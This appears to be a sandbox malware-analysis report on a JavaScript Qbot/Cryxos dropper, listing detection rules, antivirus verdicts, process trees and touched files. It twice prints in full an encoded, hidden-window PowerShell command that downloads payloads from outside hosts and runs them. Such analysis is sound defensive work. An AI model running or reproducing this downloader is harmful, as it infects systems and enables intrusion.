description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Bypass DEP | rule | disable_dep | ||||||
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Bypass DEP | rule | disable_dep |
Cyren | JS/Qbot.I!Eldorado |
Symantec | ISB.Downloader!gen63 |
Avast | JS:Obfuscated-GX [Drp] |
BitDefender | JS:Trojan.Cryxos.12541 |
MicroWorld-eScan | JS:Trojan.Cryxos.12541 |
Emsisoft | JS:Trojan.Cryxos.12541 (B) |
VIPRE | JS:Trojan.Cryxos.12541 |
FireEye | JS:Trojan.Cryxos.12541 |
GData | JS:Trojan.Cryxos.12541 |
Arcabit | JS:Trojan.Cryxos.D30FD |
Microsoft | Trojan:Script/Sabsik.FL.B!ml |
Detected | |
ALYac | JS:Trojan.Cryxos.12541 |
MAX | malware (ai score=82) |
Ikarus | Trojan.Script |
AVG | JS:Obfuscated-GX [Drp] |
parent_process | wscript.exe | martian_process | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -NoLogo -NoProfile -encodedcommand "JABCAHIAaQBkAGcAZQBiAG8AYQByAGQAIAA9ACAANwA0ADAAOwAkAGgAbwBtAG8AbAB5AHMAaQBzAE8AYwB0AGEAcgBjAGgAeQAgAD0AIAAzADUAOwAkAEIAcgBlAHQAZQBzAHMAZQBUAGgAZQBtAGUAcgAgAD0AIAAiAFMAeQBuAGMAZQBkACIAOwBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA3ADsAJAB2AGkAcABlAHIAbwB1AHMARgBpAHIAbQBhAG0AZQBuAHQAYQBsACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBHAEEARwBVAEEAYgBnAEIAdgBBAEgAVQBBAGEAUQBCAHMAQQBHAHcAQQBaAFEAQgAwAEEARgBBAEEAYwBnAEIAbABBAEcAUQBBAGEAUQBCAHoAQQBIAEEAQQBiAHcAQgB1AEEARwBVAEEAYgBnAEIAMABBAEMANABBAGMAZwBCAGwAQQBHAE0AQQBhAFEAQgB3AEEARwBVAEEAYwB3AEEAPQBQAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE0AQQBBADMAQQBDADQAQQBNAGcAQQB6AEEARABVAEEATABnAEEAeABBAEQAUQBBAE4AZwBBAHUAQQBEAEUAQQBOAHcAQQB3AEEAQQA9AD0AUABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAEUAQQBNAEEAQQB1AEEARABJAEEATQB3AEEAMgBBAEMANABBAE0AZwBBAHgAQQBEAE0AQQBMAGcAQQB4AEEARABFAEEATQBRAEEAPQBQAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAUQBBAE0AQQBBAHUAQQBEAEkAQQBNAGcAQQAyAEEAQwA0AEEATQBRAEEAeQBBAEQASQBBAEwAZwBBADUAQQBEAGcAQQAiADsAJAB1AG4AYgBsAHUAZgBmAGUAZAAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAUQBBAE8AUQBBAHUAQQBEAEUAQQBOAFEAQQAwAEEAQwA0AEEATQBRAEEAMQBBAEQAZwBBAEwAZwBBADUAQQBEAEUAQQBMAHcAQgBZAEEARwA0AEEAWgBBAEEAdgBBAEQAWQBBAGEAQQBCAEQAQQBHADQAQQBjAEEAQgBWAEEARwA4AEEAWgBnAEEAPQBuAFUAeQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFkAQQBNAGcAQQB1AEEARABJAEEATgBRAEEAeQBBAEMANABBAE0AUQBBADMAQQBEAEkAQQBMAGcAQQAxAEEARABRAEEATAB3AEEANQBBAEUAYwBBAFUAUQBBADEAQQBFAEUAQQBPAEEAQQB2AEEARwAwAEEAYwBBAEIAbgBBAEYAVQBBAFkAZwBCAHAAQQBIAEUAQQBuAFUAeQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFUAQQBPAEEAQQB1AEEARABJAEEATgBRAEEAMQBBAEMANABBAE0AZwBBAHgAQQBEAE0AQQBMAGcAQQB4AEEARABnAEEATQBRAEEAdgBBAEcAMABBAGEAUQBCAFMAQQBDADgAQQBXAGcAQgA1AEEARABFAEEAUQBnAEIARABBAEcATQBBAFYAQQBCAHoAQQBBAD0APQAiADsAZgBvAHIAZQBhAGMAaAAgACgAJAB1AG4AZwBlAG4AdABlAGUAbAB5ACAAaQBuACAAJAB1AG4AYgBsAHUAZgBmAGUAZAAgAC0AcwBwAGwAaQB0ACAAIgBuAFUAeQAiACkAIAB7ACQAUABvAGwAeQBtAGEAdABoAHMAVQBuAGQAZQByAGwAYQBwAHAAaQBuAGcAIAA9ACAAOAAzADcAOwB0AHIAeQAgAHsAJABoAHkAZAByAG8AbAB5AHoAZQBkACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgAwAEEARwBVAEEAZABBAEIAeQBBAEcARQBBAFkAdwBCAGwAQQBIAEkAQQBkAFEAQgB6AEEARQBRAEEAYQBRAEIAegBBAEgAQQBBAFoAUQBCAHYAQQBIAEEAQQBiAEEAQgBsAEEARwAwAEEAWgBRAEIAdQBBAEgAUQBBAEwAZwBCADAAQQBHADgAQQBiAHcAQgBzAEEASABNAEEASQBaAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYAVQBBAGIAZwBCAG8AQQBHAFUAQQBhAFEAQgB5AEEARwBVAEEAWgBBAEIAVABBAEgAVQBBAGMAQQBCAGwAQQBIAEkAQQBjAHcAQgAxAEEARwB3AEEAYwBBAEIAbwBBAEgAVQBBAGMAZwBCAGwAQQBIAFEAQQBMAGcAQgB3AEEARwBrAEEAWQB3AEIAMABBAEgAVQBBAGMAZwBCAGwAQQBIAE0AQQAiADsAJABwAHIAZQBhAGMAYwBvAG0AbQBvAGQAYQB0AGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAdQBuAGcAZQBuAHQAZQBlAGwAeQApACkAOwBpAHcAcgAgACQAcAByAGUAYQBjAGMAbwBtAG0AbwBkAGEAdABlACAALQBPACAAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAVAByAGkAZwBnAGUAcgBmAGkAcwBoAE8AcgBkAG8AdgBpAGEAbgAuAFUAbgBpAGYAbABvAHcAZQByAGUAZAA7ACQAbwByAGQAdQByAG8AdQBzAG4AZQBzAHMAVABvAHAAZQByAGQAbwBtACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATQBBAEEAMwBBAEMANABBAE0AZwBBAHgAQQBEAGcAQQBMAGcAQQB4AEEARABFAEEATQBnAEEAdQBBAEQARQBBAE0AQQBBADQAQQBBAD0APQB0AGQAWgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBFAEUAQQBjAGcAQgBqAEEARwBnAEEAWgBRAEIAdQBBAEcATQBBAFoAUQBCAHcAQQBHAGcAQQBZAFEAQgBzAEEARwBrAEEAWQB3AEIASABBAEgASQBBAFkAUQBCAHUAQQBIAFkAQQBhAFEAQgBzAEEARwB3AEEAWgBRAEEAdQBBAEcAVQBBAGIAZwBCAG4AQQBHAGsAQQBiAGcAQgBsAEEARwBVAEEAYwBnAEIAcABBAEcANABBAFoAdwBBAD0AIgA7ACQAYgBvAG8AawBiAGkAbgBkAGUAcgBBAHMAYwBlAHIAdABhAGkAbgBtAGUAbgB0ACAAPQAgACIASABvAGwAbwBzAGkAZABlACIAOwBpAGYAIAAoACgARwBlAHQALQBJAHQAZQBtACAALQBQAGEAdABoACAAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAVAByAGkAZwBnAGUAcgBmAGkAcwBoAE8AcgBkAG8AdgBpAGEAbgAuAFUAbgBpAGYAbABvAHcAZQByAGUAZAApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADEAOAAxADQAMQAwACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAGMAdwBCADAAQQBHAEUAQQBjAGcAQgAwAEEAQwBBAEEAYwBnAEIAMQBBAEcANABBAFoAQQBCAHMAQQBHAHcAQQBNAHcAQQB5AEEAQwBBAEEAUQB3AEEANgBBAEYAdwBBAFUAQQBCAHkAQQBHADgAQQBaAHcAQgB5AEEARwBFAEEAYgBRAEIARQBBAEcARQBBAGQAQQBCAGgAQQBGAHcAQQBWAEEAQgB5AEEARwBrAEEAWgB3AEIAbgBBAEcAVQBBAGMAZwBCAG0AQQBHAGsAQQBjAHcAQgBvAEEARQA4AEEAYwBnAEIAawBBAEcAOABBAGQAZwBCAHAAQQBHAEUAQQBiAGcAQQB1AEEARgBVAEEAYgBnAEIAcABBAEcAWQBBAGIAQQBCAHYAQQBIAGMAQQBaAFEAQgB5AEEARwBVAEEAWgBBAEEAcwBBAEUAUQBBAGIAQQBCAHMAQQBGAEkAQQBaAFEAQgBuAEEARwBrAEEAYwB3AEIAMABBAEcAVQBBAGMAZwBCAFQAQQBHAFUAQQBjAGcAQgAyAEEARwBVAEEAYwBnAEEANwBBAEUARQBBAGIAZwBCAG4AQQBIAFUAQQBiAEEAQgBoAEEASABJAEEAIgA7ACQAYQBkAHUAbAB0AGUAcgBpAHoAZQAgAD0AIAA5ADIAMwA7AGIAcgBlAGEAawA7AEEAbgBnAHUAbABhAHIAOwB9AEEAbgBnAHUAbABhAHIAOwB9ACAAYwBhAHQAYwBoACAAewAkAEkAbgB2AGkAZwBvAHIAYQB0AG8AcgAgAD0AIAA5ADcANAA7AH0AfQAkAFUAbgBzAGUAZQBtAGwAeQAgAD0AIAA4ADMAMQA7AEEAbgBnAHUAbABhAHIAOwA=" | ||||||
parent_process | wscript.exe | martian_process | powershell -WindowStyle Hidden -ExecutionPolicy Bypass -NoLogo -NoProfile -encodedcommand "JABCAHIAaQBkAGcAZQBiAG8AYQByAGQAIAA9ACAANwA0ADAAOwAkAGgAbwBtAG8AbAB5AHMAaQBzAE8AYwB0AGEAcgBjAGgAeQAgAD0AIAAzADUAOwAkAEIAcgBlAHQAZQBzAHMAZQBUAGgAZQBtAGUAcgAgAD0AIAAiAFMAeQBuAGMAZQBkACIAOwBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA3ADsAJAB2AGkAcABlAHIAbwB1AHMARgBpAHIAbQBhAG0AZQBuAHQAYQBsACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBHAEEARwBVAEEAYgBnAEIAdgBBAEgAVQBBAGEAUQBCAHMAQQBHAHcAQQBaAFEAQgAwAEEARgBBAEEAYwBnAEIAbABBAEcAUQBBAGEAUQBCAHoAQQBIAEEAQQBiAHcAQgB1AEEARwBVAEEAYgBnAEIAMABBAEMANABBAGMAZwBCAGwAQQBHAE0AQQBhAFEAQgB3AEEARwBVAEEAYwB3AEEAPQBQAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE0AQQBBADMAQQBDADQAQQBNAGcAQQB6AEEARABVAEEATABnAEEAeABBAEQAUQBBAE4AZwBBAHUAQQBEAEUAQQBOAHcAQQB3AEEAQQA9AD0AUABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAEUAQQBNAEEAQQB1AEEARABJAEEATQB3AEEAMgBBAEMANABBAE0AZwBBAHgAQQBEAE0AQQBMAGcAQQB4AEEARABFAEEATQBRAEEAPQBQAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAUQBBAE0AQQBBAHUAQQBEAEkAQQBNAGcAQQAyAEEAQwA0AEEATQBRAEEAeQBBAEQASQBBAEwAZwBBADUAQQBEAGcAQQAiADsAJAB1AG4AYgBsAHUAZgBmAGUAZAAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAUQBBAE8AUQBBAHUAQQBEAEUAQQBOAFEAQQAwAEEAQwA0AEEATQBRAEEAMQBBAEQAZwBBAEwAZwBBADUAQQBEAEUAQQBMAHcAQgBZAEEARwA0AEEAWgBBAEEAdgBBAEQAWQBBAGEAQQBCAEQAQQBHADQAQQBjAEEAQgBWAEEARwA4AEEAWgBnAEEAPQBuAFUAeQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFkAQQBNAGcAQQB1AEEARABJAEEATgBRAEEAeQBBAEMANABBAE0AUQBBADMAQQBEAEkAQQBMAGcAQQAxAEEARABRAEEATAB3AEEANQBBAEUAYwBBAFUAUQBBADEAQQBFAEUAQQBPAEEAQQB2AEEARwAwAEEAYwBBAEIAbgBBAEYAVQBBAFkAZwBCAHAAQQBIAEUAQQBuAFUAeQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFUAQQBPAEEAQQB1AEEARABJAEEATgBRAEEAMQBBAEMANABBAE0AZwBBAHgAQQBEAE0AQQBMAGcAQQB4AEEARABnAEEATQBRAEEAdgBBAEcAMABBAGEAUQBCAFMAQQBDADgAQQBXAGcAQgA1AEEARABFAEEAUQBnAEIARABBAEcATQBBAFYAQQBCAHoAQQBBAD0APQAiADsAZgBvAHIAZQBhAGMAaAAgACgAJAB1AG4AZwBlAG4AdABlAGUAbAB5ACAAaQBuACAAJAB1AG4AYgBsAHUAZgBmAGUAZAAgAC0AcwBwAGwAaQB0ACAAIgBuAFUAeQAiACkAIAB7ACQAUABvAGwAeQBtAGEAdABoAHMAVQBuAGQAZQByAGwAYQBwAHAAaQBuAGcAIAA9ACAAOAAzADcAOwB0AHIAeQAgAHsAJABoAHkAZAByAG8AbAB5AHoAZQBkACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgAwAEEARwBVAEEAZABBAEIAeQBBAEcARQBBAFkAdwBCAGwAQQBIAEkAQQBkAFEAQgB6AEEARQBRAEEAYQBRAEIAegBBAEgAQQBBAFoAUQBCAHYAQQBIAEEAQQBiAEEAQgBsAEEARwAwAEEAWgBRAEIAdQBBAEgAUQBBAEwAZwBCADAAQQBHADgAQQBiAHcAQgBzAEEASABNAEEASQBaAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYAVQBBAGIAZwBCAG8AQQBHAFUAQQBhAFEAQgB5AEEARwBVAEEAWgBBAEIAVABBAEgAVQBBAGMAQQBCAGwAQQBIAEkAQQBjAHcAQgAxAEEARwB3AEEAYwBBAEIAbwBBAEgAVQBBAGMAZwBCAGwAQQBIAFEAQQBMAGcAQgB3AEEARwBrAEEAWQB3AEIAMABBAEgAVQBBAGMAZwBCAGwAQQBIAE0AQQAiADsAJABwAHIAZQBhAGMAYwBvAG0AbQBvAGQAYQB0AGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAdQBuAGcAZQBuAHQAZQBlAGwAeQApACkAOwBpAHcAcgAgACQAcAByAGUAYQBjAGMAbwBtAG0AbwBkAGEAdABlACAALQBPACAAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAVAByAGkAZwBnAGUAcgBmAGkAcwBoAE8AcgBkAG8AdgBpAGEAbgAuAFUAbgBpAGYAbABvAHcAZQByAGUAZAA7ACQAbwByAGQAdQByAG8AdQBzAG4AZQBzAHMAVABvAHAAZQByAGQAbwBtACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATQBBAEEAMwBBAEMANABBAE0AZwBBAHgAQQBEAGcAQQBMAGcAQQB4AEEARABFAEEATQBnAEEAdQBBAEQARQBBAE0AQQBBADQAQQBBAD0APQB0AGQAWgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBFAEUAQQBjAGcAQgBqAEEARwBnAEEAWgBRAEIAdQBBAEcATQBBAFoAUQBCAHcAQQBHAGcAQQBZAFEAQgBzAEEARwBrAEEAWQB3AEIASABBAEgASQBBAFkAUQBCAHUAQQBIAFkAQQBhAFEAQgBzAEEARwB3AEEAWgBRAEEAdQBBAEcAVQBBAGIAZwBCAG4AQQBHAGsAQQBiAGcAQgBsAEEARwBVAEEAYwBnAEIAcABBAEcANABBAFoAdwBBAD0AIgA7ACQAYgBvAG8AawBiAGkAbgBkAGUAcgBBAHMAYwBlAHIAdABhAGkAbgBtAGUAbgB0ACAAPQAgACIASABvAGwAbwBzAGkAZABlACIAOwBpAGYAIAAoACgARwBlAHQALQBJAHQAZQBtACAALQBQAGEAdABoACAAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAVAByAGkAZwBnAGUAcgBmAGkAcwBoAE8AcgBkAG8AdgBpAGEAbgAuAFUAbgBpAGYAbABvAHcAZQByAGUAZAApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADEAOAAxADQAMQAwACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAGMAdwBCADAAQQBHAEUAQQBjAGcAQgAwAEEAQwBBAEEAYwBnAEIAMQBBAEcANABBAFoAQQBCAHMAQQBHAHcAQQBNAHcAQQB5AEEAQwBBAEEAUQB3AEEANgBBAEYAdwBBAFUAQQBCAHkAQQBHADgAQQBaAHcAQgB5AEEARwBFAEEAYgBRAEIARQBBAEcARQBBAGQAQQBCAGgAQQBGAHcAQQBWAEEAQgB5AEEARwBrAEEAWgB3AEIAbgBBAEcAVQBBAGMAZwBCAG0AQQBHAGsAQQBjAHcAQgBvAEEARQA4AEEAYwBnAEIAawBBAEcAOABBAGQAZwBCAHAAQQBHAEUAQQBiAGcAQQB1AEEARgBVAEEAYgBnAEIAcABBAEcAWQBBAGIAQQBCAHYAQQBIAGMAQQBaAFEAQgB5AEEARwBVAEEAWgBBAEEAcwBBAEUAUQBBAGIAQQBCAHMAQQBGAEkAQQBaAFEAQgBuAEEARwBrAEEAYwB3AEIAMABBAEcAVQBBAGMAZwBCAFQAQQBHAFUAQQBjAGcAQgAyAEEARwBVAEEAYwBnAEEANwBBAEUARQBBAGIAZwBCAG4AQQBIAFUAQQBiAEEAQgBoAEEASABJAEEAIgA7ACQAYQBkAHUAbAB0AGUAcgBpAHoAZQAgAD0AIAA5ADIAMwA7AGIAcgBlAGEAawA7AEEAbgBnAHUAbABhAHIAOwB9AEEAbgBnAHUAbABhAHIAOwB9ACAAYwBhAHQAYwBoACAAewAkAEkAbgB2AGkAZwBvAHIAYQB0AG8AcgAgAD0AIAA5ADcANAA7AH0AfQAkAFUAbgBzAGUAZQBtAGwAeQAgAD0AIAA4ADMAMQA7AEEAbgBnAHUAbABhAHIAOwA=" | ||||||
parent_process | wscript.exe | martian_process | "C:\Windows\System32\wscript.exe" "C:\Users\test22\AppData\Local\Temp\Xpksf.js" Aquaphobia araneiformDustheap Denumeral AntipneumococcicNesotragus | ||||||
parent_process | wscript.exe | martian_process | wscript "C:\Users\test22\AppData\Local\Temp\Xpksf.js" Aquaphobia araneiformDustheap Denumeral AntipneumococcicNesotragus |
option | -executionpolicy bypass | value | Attempts to bypass execution policy | ||||||
option | -noprofile | value | Does not load current user profile | ||||||
option | -nologo | value | Hides the copyright banner when PowerShell launches | ||||||
option | -windowstyle hidden | value | Attempts to execute command with a hidden window | ||||||
option | -executionpolicy bypass | value | Attempts to bypass execution policy | ||||||
option | -noprofile | value | Does not load current user profile | ||||||
option | -nologo | value | Hides the copyright banner when PowerShell launches | ||||||
option | -windowstyle hidden | value | Attempts to execute command with a hidden window |
file | C:\Windows\SysWOW64\wscript.exe |
file | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
file | C:\Windows\System32\ie4uinit.exe |
file | C:\Program Files\Windows Sidebar\sidebar.exe |
file | C:\Windows\System32\WindowsAnytimeUpgradeUI.exe |
file | C:\Windows\System32\xpsrchvw.exe |
file | C:\Windows\System32\displayswitch.exe |
file | C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe |
file | C:\Windows\System32\mblctr.exe |
file | C:\Windows\System32\mstsc.exe |
file | C:\Windows\System32\SnippingTool.exe |
file | C:\Windows\System32\SoundRecorder.exe |
file | C:\Windows\System32\dfrgui.exe |
file | C:\Windows\System32\msinfo32.exe |
file | C:\Windows\System32\rstrui.exe |
file | C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe |
file | C:\Program Files\Windows Journal\Journal.exe |
file | C:\Windows\System32\MdSched.exe |
file | C:\Windows\System32\msconfig.exe |
file | C:\Windows\System32\recdisc.exe |
file | C:\Windows\System32\msra.exe |